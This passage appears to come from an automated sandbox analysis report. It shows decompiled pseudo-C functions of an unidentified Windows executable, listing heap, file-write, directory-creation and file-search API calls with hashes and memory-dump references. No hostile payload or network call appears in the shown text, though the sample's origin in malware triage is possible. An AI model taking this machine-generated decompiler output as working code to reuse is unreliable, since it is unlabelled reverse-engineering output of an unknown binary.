                              					if(_t19 != 2) {
                              						goto L11;
                              					} else {
                              						_t24 = _a4;
                              						__eflags = _t24;
                              						if(_t24 == 0) {
                              							_t44 = 0x10;
                              						} else {
                              							_t9 = _t24 + 0xf; // 0xf
                              							_t44 = _t9 & 0xfffffff0;
                              						}
                              						_a4 = _t44;
                              						__eflags = _t44 -  *0x42283c; // 0x1e0
                              						if(__eflags > 0) {
                              							L10:
                              							_push(_t44);
                              							goto L14;
                              						} else {
                              							E0041570A(9);
                              							_pop(_t36);
                              							_v8 = 1;
                              							_v32 = E00416894(_t36, _t44 >> 4);
                              							_v8 = _v8 | 0xffffffff;
                              							E00413F69();
                              							_t23 = _v32;
                              							__eflags = _t23;
                              							if(_t23 == 0) {
                              								goto L10;
                              							}
                              						}
                              					}
                              				} else {
                              					_t46 = _a4;
                              					_t50 = _t46 -  *0x425a30; // 0x0
                              					if(_t50 > 0) {
                              						L11:
                              						_t20 = _a4;
                              						__eflags = _t20;
                              						if(_t20 == 0) {
                              							_t20 = 1;
                              						}
                              						_t22 = _t20 + 0x0000000f & 0x000000f0;
                              						__eflags = _t22;
                              						_push(_t22);
                              						L14:
                              						_push(0);
                              						_t23 = RtlAllocateHeap( *0x425a34); // executed
                              					} else {
                              						E0041570A(9);
                              						_v8 = _v8 & 0x00000000;
                              						_push(_t46);
                              						_v32 = E00415DF1();
                              						_v8 = _v8 | 0xffffffff;
                              						E00413F0A();
                              						_t23 = _v32;
                              						if(_t23 == 0) {
                              							goto L11;
                              						} else {
                              						}
                              					}
                              				}
                              				 *[fs:0x0] = _v20;
                              				return _t23;
                              			}

















                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,-0000000F,00000000,?,00000000,00000000,00000000), ref: 00413F8A
                                • Part of subcall function 0041570A: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,00416FB2,00000009,00000000,00000000,00000001,00415548,00000001,00000074,?,?,00000000,00000001), ref: 00415747
                                • Part of subcall function 0041570A: EnterCriticalSection.KERNEL32(?,?,?,00416FB2,00000009,00000000,00000000,00000001,00415548,00000001,00000074,?,?,00000000,00000001), ref: 00415762
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: CriticalSection$AllocateEnterHeapInitialize
                              • String ID:
                              • API String ID: 1616793339-0
                              • Opcode ID: ba869b70dadc95adccf46eac288c3ec4a3f94eb288c9c5288a46f5d51cb0c97c
                              • Instruction ID: 7c2cfac85a053aeac9454e1c2b35b253285297f11283e44f43d764ba5cf7311f
                              • Opcode Fuzzy Hash: ba869b70dadc95adccf46eac288c3ec4a3f94eb288c9c5288a46f5d51cb0c97c
                              • Instruction Fuzzy Hash: 1A217431E44605EBDB10AFA9DC42BDAB7B4EB01765F10421BF411EB2D0C778AAC28A58
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 30%
                              			E00413F9F(intOrPtr _a4) {
                              				signed int _v8;
                              				char _v20;
                              				intOrPtr _v32;
                              				char _v36;
                              				intOrPtr _v40;
                              				char _v44;
                              				char _t19;
                              				intOrPtr _t20;
                              				intOrPtr _t24;
                              				intOrPtr _t27;
                              				intOrPtr _t40;
                              				char _t42;
                              				intOrPtr _t49;
                              
                              				_push(0xffffffff);
                              				_push(0x41b9a0);
                              				_push(E00414A2C);
                              				_t19 =  *[fs:0x0];
                              				_push(_t19);
                              				 *[fs:0x0] = _t42;
                              				_t40 = _a4;
                              				if(_t40 != 0) {
                              					_t20 =  *0x425a38; // 0x1
                              					if(_t20 != 3) {
                              						if(_t20 != 2) {
                              							_push(_t40);
                              							goto L12;
                              						} else {
                              							E0041570A(9);
                              							_v8 = 1;
                              							_t24 = E004167F8(_t40,  &_v44,  &_v36);
                              							_v40 = _t24;
                              							if(_t24 != 0) {
                              								E0041684F(_v44, _v36, _t24);
                              							}
                              							_v8 = _v8 | 0xffffffff;
                              							_t19 = E00414061();
                              							goto L9;
                              						}
                              					} else {
                              						E0041570A(9);
                              						_v8 = _v8 & 0x00000000;
                              						_t27 = E00415A9D(_t40);
                              						_v32 = _t27;
                              						if(_t27 != 0) {
                              							_push(_t40);
                              							_push(_t27);
                              							E00415AC8();
                              						}
                              						_v8 = _v8 | 0xffffffff;
                              						_t19 = E00414009();
                              						_t49 = _v32;
                              						L9:
                              						if(_t49 == 0) {
                              							_push(_a4);
                              							L12:
                              							_push(0);
                              							_t19 = RtlFreeHeap( *0x425a34); // executed
                              						}
                              					}
                              				}
                              				 *[fs:0x0] = _v20;
                              				return _t19;
                              			}

















                              APIs
                              • RtlFreeHeap.NTDLL(00000000,00000000,00000000,?,00000000,?,00416FB2,00000009,00000000,00000000,00000001,00415548,00000001,00000074), ref: 00414073
                                • Part of subcall function 0041570A: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,00416FB2,00000009,00000000,00000000,00000001,00415548,00000001,00000074,?,?,00000000,00000001), ref: 00415747
                                • Part of subcall function 0041570A: EnterCriticalSection.KERNEL32(?,?,?,00416FB2,00000009,00000000,00000000,00000001,00415548,00000001,00000074,?,?,00000000,00000001), ref: 00415762
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: CriticalSection$EnterFreeHeapInitialize
                              • String ID:
                              • API String ID: 641406236-0
                              • Opcode ID: d24b5f948fba04bba88b9cd0cdc5eff1b7a8b89ab7c34ea04cbff2048bde7936
                              • Instruction ID: 47133188c5d3e4a4a91398ef735a592283a7fe3b34e77d79aa204ad2d485eaa9
                              • Opcode Fuzzy Hash: d24b5f948fba04bba88b9cd0cdc5eff1b7a8b89ab7c34ea04cbff2048bde7936
                              • Instruction Fuzzy Hash: 8321C572901609EADB20ABA6DC46BDE7B78EF48764F14021BF511B61C0D77C89C18AAD
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 87%
                              			E0040A011(signed int __ecx, void* __eflags) {
                              				void* _t28;
                              				intOrPtr* _t42;
                              				intOrPtr* _t43;
                              				void* _t49;
                              
                              				E00413954(E00419E67, _t49);
                              				_push(__ecx);
                              				_push(__ecx);
                              				 *((intOrPtr*)(_t49 - 0x10)) = __ecx;
                              				 *(_t49 - 4) = 4;
                              				E004042AD(__ecx + 0xb4);
                              				 *(_t49 - 4) = 3;
                              				E004042AD(__ecx + 0xa0);
                              				_t42 = __ecx + 0x8c;
                              				 *((intOrPtr*)(_t49 - 0x14)) = _t42;
                              				 *_t42 = 0x41b6c0;
                              				 *(_t49 - 4) = 5;
                              				E004042D6();
                              				 *(_t49 - 4) = 2;
                              				E004042AD(_t42);
                              				_t43 = __ecx + 0x78;
                              				 *((intOrPtr*)(_t49 - 0x14)) = _t43;
                              				 *_t43 = 0x41b6c8;
                              				 *(_t49 - 4) = 6;
                              				E004042D6();
                              				 *(_t49 - 4) = 1;
                              				E004042AD(_t43);
                              				 *(_t49 - 4) =  *(_t49 - 4) & 0x00000000;
                              				E00407868(__ecx);
                              				 *(_t49 - 4) =  *(_t49 - 4) | 0xffffffff;
                              				asm("sbb ecx, ecx");
                              				_t28 = E00409C49( ~__ecx & __ecx + 0x00000014,  ~__ecx & __ecx + 0x00000014); // executed
                              				 *[fs:0x0] =  *((intOrPtr*)(_t49 - 0xc));
                              				return _t28;
                              			}








                              APIs
                              • __EH_prolog.LIBCMT ref: 0040A016
                                • Part of subcall function 00409C49: __EH_prolog.LIBCMT ref: 00409C4E
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: a5db852efdc6b67417a23c65be594c4014babbfd4966d5bc1e1ef807a1e39f82
                              • Instruction ID: 1dffea12e82b47f2a36155f0264cd4dada82ecc0bfe076f3ab6191fd12039e28
                              • Opcode Fuzzy Hash: a5db852efdc6b67417a23c65be594c4014babbfd4966d5bc1e1ef807a1e39f82
                              • Instruction Fuzzy Hash: 4C118FB0A01254DADB09EBAAC5153EDFBA69FA1318F14419FA542732D2CBF81B048666
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 81%
                              			E004092E9(void* __ecx, void* __eflags) {
                              				signed char _t22;
                              				void* _t24;
                              				void* _t45;
                              				void* _t47;
                              
                              				E00413954(E00419BF8, _t47);
                              				_t45 = __ecx;
                              				_t41 = __ecx + 0x10;
                              				E00401D7A(__ecx + 0x10,  *((intOrPtr*)(_t47 + 8)));
                              				_push( *((intOrPtr*)(_t47 + 0xc)));
                              				_push( *((intOrPtr*)(E00402634(_t47 - 0x18, _t41))));
                              				 *(_t47 - 4) = 0;
                              				_t22 = E00405841(__ecx + 0x20, _t41); // executed
                              				asm("sbb bl, bl");
                              				 *(_t47 - 4) =  *(_t47 - 4) | 0xffffffff;
                              				E00403A9C( *((intOrPtr*)(_t47 - 0x18)));
                              				if( ~_t22 + 1 != 0) {
                              					 *((intOrPtr*)(_t47 + 8)) = 1;
                              					E00413D3D(_t47 + 8, 0x41c4c0);
                              				}
                              				_t24 = E004042D6();
                              				 *(_t45 + 0x58) =  *(_t45 + 0x58) & 0x00000000;
                              				 *((intOrPtr*)(_t45 + 0x88)) = 0;
                              				 *((intOrPtr*)(_t45 + 0x8c)) = 0;
                              				 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0xc));
                              				return _t24;
                              			}








                              APIs
                              • __EH_prolog.LIBCMT ref: 004092EE
                                • Part of subcall function 00402634: __EH_prolog.LIBCMT ref: 00402639
                                • Part of subcall function 00405841: __EH_prolog.LIBCMT ref: 00405846
                                • Part of subcall function 00413D3D: RaiseException.KERNEL32(00000003,00000000,00000003,?,00000003,?,00000003,00000000,00000000,00401055,00000003,?,00000000), ref: 00413D6B
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog$ExceptionRaise
                              • String ID:
                              • API String ID: 2062786585-0
                              • Opcode ID: 0f97881bfda5a338648d471f12701516f54a75613031e54e105c5c79c14cffea
                              • Instruction ID: f7fbb3e9a8787d76bf0f9f15101cef5fd9d7ebfa1ebb25f778e30044bb5e9d70
                              • Opcode Fuzzy Hash: 0f97881bfda5a338648d471f12701516f54a75613031e54e105c5c79c14cffea
                              • Instruction Fuzzy Hash: 7B01D6766406049ACB10EF25C451ADEBBB1FF95318F00852FE896632E1CB785649CF54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 64%
                              			E00404D6C(void* __ecx) {
                              				signed char _t18;
                              				intOrPtr* _t24;
                              				void* _t25;
                              				void* _t27;
                              				void* _t30;
                              				void* _t41;
                              
                              				E00413954(E004195F0, _t41);
                              				 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                              				_t18 =  *(__ecx + 0x20) >> 4;
                              				_t46 = _t18 & 0x00000001;
                              				if((_t18 & 0x00000001) == 0) {
                              					_t30 = __ecx + 0x28;
                              					__eflags = _t30;
                              					_push(_t30);
                              					_t27 = E00404BDC( *((intOrPtr*)(E00405417(_t41 - 0x18, _t41 + 8))), __eflags);
                              					_push( *((intOrPtr*)(_t41 - 0x18)));
                              				} else {
                              					_push(__ecx + 0x28);
                              					_t24 = E00405417(_t41 - 0x18, _t41 + 8);
                              					 *(_t41 - 4) = 1;
                              					_t25 = E00404C4A(_t24, _t46); // executed
                              					_t27 = _t25;
                              					_push( *((intOrPtr*)(_t41 - 0x18)));
                              				}
                              				E00403A9C();
                              				E00403A9C( *((intOrPtr*)(_t41 + 8)));
                              				 *[fs:0x0] =  *((intOrPtr*)(_t41 - 0xc));
                              				return _t27;
                              			}










                              APIs
                              • __EH_prolog.LIBCMT ref: 00404D71
                                • Part of subcall function 00405417: __EH_prolog.LIBCMT ref: 0040541C
                                • Part of subcall function 00404C4A: __EH_prolog.LIBCMT ref: 00404C4F
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: 0829d6d4e2349ba8d3de6fc09fd6bc5a7f7a281632d8264b3d1e6490f9b222f7
                              • Instruction ID: f66e6ca9409e8e8da17af4a7d05db337a423f76100d3163e29410ef6f876c1fe
                              • Opcode Fuzzy Hash: 0829d6d4e2349ba8d3de6fc09fd6bc5a7f7a281632d8264b3d1e6490f9b222f7
                              • Instruction Fuzzy Hash: 4901A2B25101049ACB09EF90C852BED7B70EF94308F00412FE505776D2DB395A99CA48
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E004027A6(void* __ecx) {
                              				void* _t17;
                              				signed int _t31;
                              				intOrPtr _t34;
                              				void* _t36;
                              
                              				E00413954(E0041919C, _t36);
                              				E00401CE1(_t36 - 0x18, __ecx + 0x10);
                              				_t34 =  *((intOrPtr*)(_t36 + 8));
                              				_t31 = 0;
                              				 *((intOrPtr*)(_t36 - 4)) = 0;
                              				if( *((intOrPtr*)(_t34 + 8)) > 0) {
                              					do {
                              						E00401DE3(_t36 - 0x18,  *((intOrPtr*)( *((intOrPtr*)(_t34 + 0xc)) + _t31 * 4)));
                              						E0040499C( *((intOrPtr*)(_t36 - 0x18))); // executed
                              						E00401DB8(_t36 - 0x18, 0x5c);
                              						_t31 = _t31 + 1;
                              					} while (_t31 <  *((intOrPtr*)(_t34 + 8)));
                              				}
                              				_t17 = E00403A9C( *((intOrPtr*)(_t36 - 0x18)));
                              				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
                              				return _t17;
                              			}








                              APIs
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: 01677122db5f9a9dc92e0e68fc714b810c240e95920f6c7928f993aadc845804
                              • Instruction ID: 116dfd3529ede02fc162d870fedee277598c738aed7d6567ac0ffa60a71ea666
                              • Opcode Fuzzy Hash: 01677122db5f9a9dc92e0e68fc714b810c240e95920f6c7928f993aadc845804
                              • Instruction Fuzzy Hash: BCF04F719005069BDB15EB9AC892AEFBBB5FF80308F00403FE142775E2CA787985DB84
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E004048B7(WCHAR* __ecx, long __edx) {
                              				char _v16;
                              				void* __ebp;
                              				signed int _t5;
                              				void* _t9;
                              
                              				if( *0x423148 != 0) {
                              					_t5 = SetFileAttributesW(__ecx, __edx); // executed
                              					return _t5 & 0xffffff00 | _t5 != 0x00000000;
                              				}
                              				_t9 = E0040489C( *((intOrPtr*)(E004048FF( &_v16, __ecx))), __edx);
                              				E00403A9C(_v16);
                              				return _t9;
                              			}








                              APIs
                              • SetFileAttributesW.KERNELBASE ref: 004048F1
                                • Part of subcall function 004048FF: __EH_prolog.LIBCMT ref: 00404904
                                • Part of subcall function 004048FF: AreFileApisANSI.KERNEL32(?,?,?,?,?,00000000), ref: 00404920
                                • Part of subcall function 0040489C: SetFileAttributesA.KERNELBASE(?,00000000,00404D1C,?,00000000,0000002A,0000005C,00000003,?,00000000), ref: 0040489E
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: File$Attributes$ApisH_prolog
                              • String ID:
                              • API String ID: 3885834519-0
                              • Opcode ID: 5b715810b1dd674a34631cbecd8c08cc0b37525bd29b6e223b4e60d05e4c896b
                              • Instruction ID: d8abee0b5bf8aaacd3c7805e8248c04f8c14d25ec22198af343fb12e16f398c4
                              • Opcode Fuzzy Hash: 5b715810b1dd674a34631cbecd8c08cc0b37525bd29b6e223b4e60d05e4c896b
                              • Instruction Fuzzy Hash: 76E02B66F002502BC7103BA5AC065DB3B9D9B81314B20C43BA602A3291E9388E44A258
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E0040499C(WCHAR* __ecx) {
                              				char _v16;
                              				void* __ebp;
                              				signed int _t5;
                              				void* _t8;
                              
                              				if( *0x423148 != 0) {
                              					_t5 = CreateDirectoryW(__ecx, 0); // executed
                              					return _t5 & 0xffffff00 | _t5 != 0x00000000;
                              				} else {
                              					_t8 = E0040498D( *((intOrPtr*)(E004048FF( &_v16, __ecx))));
                              					E00403A9C(_v16);
                              					return _t8;
                              				}
                              			}








                              APIs
                              • CreateDirectoryW.KERNELBASE(?,00000000,?,?,00000000), ref: 004049D0
                                • Part of subcall function 004048FF: __EH_prolog.LIBCMT ref: 00404904
                                • Part of subcall function 004048FF: AreFileApisANSI.KERNEL32(?,?,?,?,?,00000000), ref: 00404920
                                • Part of subcall function 0040498D: CreateDirectoryA.KERNELBASE(?,00000000,00405228,?,?,?,?,00000003,?,00000000,?,00000000), ref: 00404990
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: CreateDirectory$ApisFileH_prolog
                              • String ID:
                              • API String ID: 1021588753-0
                              • Opcode ID: 64b02790250bc5f7a2d9c9dee2bb0ba3baf7154ac0717740dd27b10109941aca
                              • Instruction ID: 2f64d7a75cdf7ff6db5ed191fdbb19fa086d8aebc57dacf92a4c812467fb8a6f
                              • Opcode Fuzzy Hash: 64b02790250bc5f7a2d9c9dee2bb0ba3baf7154ac0717740dd27b10109941aca
                              • Instruction Fuzzy Hash: 18E0DFA0B002002BCB147B79AC0679E376D4B80218F10867EA652671E1EA7999449608
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E004050AB(CHAR* __ecx, CHAR* __edx, CHAR** _a4) {
                              				int _t4;
                              				CHAR* _t8;
                              				CHAR* _t13;
                              				CHAR** _t15;
                              
                              				_t15 = _a4;
                              				_t13 = __edx;
                              				_t8 = __ecx;
                              				if(_t15[2] <= 0x105) {
                              					E0040243E(_t15, 0x105);
                              				}
                              				_t4 = GetTempFileNameA(_t8, _t13, 0,  *_t15); // executed
                              				E00404296(_t15);
                              				return _t4;
                              			}








                              APIs
                              • GetTempFileNameA.KERNELBASE(?,?,00000000,00000003,?,?,00000000,004050FF,?,?,?,00405160,?,?,?,00000003), ref: 004050CE
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: FileNameTemp
                              • String ID:
                              • API String ID: 745986568-0
                              • Opcode ID: b528cc7740eeb1b4bc26185d4807bc948aa73c1e47f21f7391ebf62f515a6cd3
                              • Instruction ID: d5c13e583cf4c34c7a3a11816bb62f42e40da82da4d3cfe63a6d47b8b5213b5b
                              • Opcode Fuzzy Hash: b528cc7740eeb1b4bc26185d4807bc948aa73c1e47f21f7391ebf62f515a6cd3
                              • Instruction Fuzzy Hash: 91E086723016106BD71056699C45A4BA7DEDFD8752F15843FB545E3381D6B48C004A78
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 84%
                              			E004058CD(void* __ecx, void* __edx, void* __eflags) {
                              				void* _t10;
                              				void* _t25;
                              
                              				E00413954(E00419718, _t25);
                              				E00404D51(_t25 - 0x44);
                              				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
                              				_push(__ecx);
                              				_t10 = E00405806(_t25 - 0x44, __edx); // executed
                              				E00403A9C( *((intOrPtr*)(_t25 - 0x1c)));
                              				 *[fs:0x0] =  *((intOrPtr*)(_t25 - 0xc));
                              				return _t10;
                              			}






                              APIs
                              • __EH_prolog.LIBCMT ref: 004058D2
                                • Part of subcall function 00405806: __EH_prolog.LIBCMT ref: 0040580B
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID:
                              • API String ID: 3519838083-0
                              • Opcode ID: 4dbd7d17023fb4ed967e01381c8a8867ec9f7b58b557c0ee91cef2e13e81d9e3
                              • Instruction ID: 5bfd618a99589873673dbdde5608ad138896477ef474a485a6b18cf586c7d2b5
                              • Opcode Fuzzy Hash: 4dbd7d17023fb4ed967e01381c8a8867ec9f7b58b557c0ee91cef2e13e81d9e3
                              • Instruction Fuzzy Hash: E7E01A72D410049ACB05BB95E9526EDB778EF51319F10403BA412725919B785E18CA58
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 86%
                              			E00405C87(void** __ecx, void* _a4, long _a8, intOrPtr* _a12) {
                              				long _v8;
                              				long _t12;
                              				signed int _t14;
                              				void** _t16;
                              
                              				_t16 = __ecx;
                              				_push(__ecx);
                              				_t12 =  *0x42045c; // 0x400000
                              				if(_a8 > _t12) {
                              					_a8 = _t12;
                              				}
                              				_v8 = _v8 & 0x00000000;
                              				_t14 = WriteFile( *_t16, _a4, _a8,  &_v8, 0); // executed
                              				 *_a12 = _v8;
                              				return _t14 & 0xffffff00 | _t14 != 0x00000000;
                              			}








                              APIs
                              • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00405CAA
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: FileWrite
                              • String ID:
                              • API String ID: 3934441357-0
                              • Opcode ID: e8bb3e3f97a2863afff16af0127552a93838812ee23e56086e0288621279a6ee
                              • Instruction ID: 646c0e8b7f70081892c45aa98fa77e415187d9694f298a279afc83584de54578
                              • Opcode Fuzzy Hash: e8bb3e3f97a2863afff16af0127552a93838812ee23e56086e0288621279a6ee
                              • Instruction Fuzzy Hash: F8E0E575600208FFCB11CF95C801B8E7BF9EB09364F20C069F914AA260D339EA50DF54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E004057CF(void** __ecx, intOrPtr _a4) {
                              				struct _WIN32_FIND_DATAA _v324;
                              				int _t7;
                              				signed int _t10;
                              				signed int _t11;
                              
                              				_t7 = FindNextFileA( *__ecx,  &_v324); // executed
                              				_t11 = _t10 & 0xffffff00 | _t7 != 0x00000000;
                              				_t16 = _t11;
                              				if(_t11 != 0) {
                              					E0040557F( &_v324, _a4, _t16);
                              				}
                              				return _t11;
                              			}








                              APIs
                              • FindNextFileA.KERNELBASE(000000FF,?,00000000), ref: 004057E2
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: FileFindNext
                              • String ID:
                              • API String ID: 2029273394-0
                              • Opcode ID: 3f971b6e9297c3c0785ec7bffefe866e244883e864d52b31c5d14701259a415c
                              • Instruction ID: a758ab2b17ce6f49d488120cb08fd5c978c50398f8c9baf96463bb2a7ddcf629
                              • Opcode Fuzzy Hash: 3f971b6e9297c3c0785ec7bffefe866e244883e864d52b31c5d14701259a415c
                              • Instruction Fuzzy Hash: 7CD0C231140009ABC711EB21DC41EEA33ADEB04348F144075AA495B1B0EA319D489F54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 86%
                              			E00405841(void* __ecx, void* __edx) {
                              				void* _t11;
                              				void* _t22;
                              
                              				E00413954(E004196F0, _t22);
                              				_push(__ecx);
                              				 *(_t22 - 0x10) =  *(_t22 - 0x10) | 0xffffffff;
                              				_t3 = _t22 - 4;
                              				 *(_t22 - 4) =  *(_t22 - 4) & 0x00000000;
                              				_t11 = E004055DE(_t22 - 0x10,  *_t3,  *((intOrPtr*)(_t22 + 8)), __ecx); // executed
                              				E0040551A(_t22 - 0x10);
                              				 *[fs:0x0] =  *((intOrPtr*)(_t22 - 0xc));
                              				return _t11;
                              			}






                              APIs
                              • __EH_prolog.LIBCMT ref: 00405846
                                • Part of subcall function 004055DE: __EH_prolog.LIBCMT ref: 004055E3
                                • Part of subcall function 004055DE: FindFirstFileW.KERNELBASE(?,?), ref: 00405611
                                • Part of subcall function 0040551A: FindClose.KERNELBASE(?,000000FF,0040554B,000000FF), ref: 00405525
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: FindH_prolog$CloseFileFirst
                              • String ID:
                              • API String ID: 2004497850-0
                              • Opcode ID: 220b4cbfc40620496b03372d3826f196b8ab05123004ed9f75f8387d5271fe3c
                              • Instruction ID: b7fde63f1f0c292b4e5d00ec8c3d5d27a79480d2707f186765d0e2b5b752fd38
                              • Opcode Fuzzy Hash: 220b4cbfc40620496b03372d3826f196b8ab05123004ed9f75f8387d5271fe3c
                              • Instruction Fuzzy Hash: 7CE04FB1951506ABCB14DF50CC52AEEB734FB1131CF10421EE021722D08B785648CA28
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 86%
                              			E00405806(void* __ecx, void* __edx) {
                              				void* _t11;
                              				void* _t22;
                              
                              				E00413954(E004196DC, _t22);
                              				_push(__ecx);
                              				 *(_t22 - 0x10) =  *(_t22 - 0x10) | 0xffffffff;
                              				_t3 = _t22 - 4;
                              				 *(_t22 - 4) =  *(_t22 - 4) & 0x00000000;
